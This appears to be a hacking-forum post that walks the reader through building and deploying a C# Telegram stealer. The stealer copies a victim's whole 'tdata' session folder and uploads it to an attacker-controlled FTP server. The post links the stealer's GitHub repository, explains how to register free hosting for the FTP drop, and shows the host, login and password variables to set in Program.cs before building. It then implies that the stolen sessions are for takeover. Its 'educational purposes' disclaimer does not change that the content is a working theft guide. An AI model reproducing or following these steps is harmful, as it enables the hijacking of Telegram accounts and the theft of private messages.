Telegram stealer in C #

Mutt

Professional
Messages
1,057
Reputation
7
Reaction score
595
Points
113
This material is provided for educational purposes only and was created as part of the study of information security. The author did not publish material for malicious purposes. If someone uses the information for personal gain, then the author is not responsible for any harm or damage caused.

Yes, there is already a telegram stealer, which is written in python, but python has a lot of weight at the output, and the stealer in C # weighs about 844kb.
The pluses of this stealer include the fact that it steals the entire tdata folder.

Let's get started!

Installing VisualStudio
To download Visual Studio 2019, go to their website:
c671a552-c1bc-45bc-9d87-afbf57786412.png


Poke Download.
After downloading the studio, we must click on the checkbox:

Hosting setup
You can take any hosting, you just need to have an FTP connection.
Let's take a look at 000webhost as an example.
We register, create a website and get the data for connecting to FTP in the control panel.

We save our data and go to the code.

Setting up and building the code
Code link - https://github.com/dogberttg/TeleSteal

Download, unpack the archive, and open TeleSteal.sln through Visual Studio.
447a7465-fdd6-4699-878c-177eeae4e590.png


Select Program.cs, scroll to the bottom of the code until we see this block of code.
In these three variables we insert data from our FTP host.

In my case, this is:
Code:
host = "files.000wehhost.com"
login = "kofkorx"
pass = "here is my password"

Everything!
We just need to select Debug> Release from above and press Ctrl + B to create a build of our code.
06b42a16-d6cf-4380-ae84-414b83a2301f.png


Launch
Now let's run this script and see what happens.
At first glance, nothing is happening, but let's go to the hosting file manager and take a look...

ca1ee684-a1a6-4aac-8c20-953a321f3798.png

b7cac081-187d-4c10-ade1-389e7be4644b.png


I don't think you need to explain how to use these files.
 
Top